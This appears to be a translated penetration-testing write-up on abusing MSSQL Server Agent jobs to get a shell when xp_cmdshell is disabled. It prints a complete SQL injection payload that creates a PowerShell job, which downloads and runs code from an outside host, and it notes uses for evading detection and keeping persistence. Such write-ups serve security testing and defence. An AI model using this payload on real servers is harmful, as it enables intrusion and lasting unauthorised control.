MSSQL Agent Work Server Remote command execution

Overview

If the MSSQL server Agent job service is turned on in the MSSQL database, the attacker will be able to take advantage of the functionality that comes with the MSSQL server to get a shell.

SQL Server Agent

SQL Server Agent is a Windows service that can be used to perform automated tasks.

Attack analysis

Take advantage of local features in MSSQL Server to execute arbitrary commands in the Windows operating system. During the entire test process, the xp_cmdshell stored procedure has been disabled and limits the ability to create custom stored procedures.

When xp_cmdshell extended stored procedures are used in an attack, most security monitoring or detection systems generate alerts. The misuse of xp_cmdshell by attackers and penetration testers has led many organizations and businesses to start disabling or restricting xp_cmdshell.

The MSSQL Server Agent can be used to execute arbitrary control commands on the target database server. However, the target server must meet several conditions:

1. The target server must have the MSSQL Server Agent service enabled;
2. The user account currently running in the server must have sufficient permissions to create and execute the agent job;

Two available MSSQL Agent job subsystems: CmdExec and PowerShell subsystem, which can be used to execute operating system commands and PowerShell scripts, respectively, for the two functions.

You can use SQL injection points to create and perform agent tasks. The command required to execute a task is a PowerShell code that allows the target system to communicate with a Optiv-controlled IP address and then download additional PowerShell instructions. This allows an interactive command-control session to be established between the target database server and the Optiv-controlled server.

The following code shows the SQL statements that have been split. In the download command below, the URI is between two single quotes, not the previous double quotation marks. This is done in order to relay the single quotation marks in the SQL statement.

USE msdb; EXEC dbo.sp_add_job @job_name = N‘test_powershell_job1‘ ; EXEC sp_add_jobstep @job_name = N‘test_powershell_job1‘, @step_name = N‘test_powershell_name1‘, @subsystem = N‘PowerShell‘, @command = N‘powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(‘‘http://IP_OR_HOSTNAME/file‘‘))"‘, @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N‘test_powershell_job1‘; EXEC dbo.sp_start_job N‘test_powershell_job1‘;

Attack test

As shown, the SQL statement has been URL-encoded. In this attack example, the attack is sent over an HTTP GET request, so we need to URL-encode the attack payload.

You can see that we have added SQL injection payload to the parameters of the HTTP GET request, so that we can use SQL injection. (Note the%20 (space character) added at the beginning of the payload)

When payload is running, we can see that the command control session has been established successfully and is using the permissions of the "SQLServerAgent" account.

In SQL Server for the target host, we can see that the SQL Agent job has been created successfully.

Summarize

If the target host runs the MSSQL Agent service and the user account used by the proxy service can access other MSSQL servers, then this attack can be used to perform the MSSQL Server Agent job in the other MSSQL server. In addition, you can set up a timed agent job, which means that you can not only use this method to evade security detection, but also to achieve persistent control of the target MSSQL server.

In some cases, if the MSSQL Server Proxy service is using a higher-privileged user account, then this attack can be used to implement the rights.

MSSQL Agent Work Server Remote command execution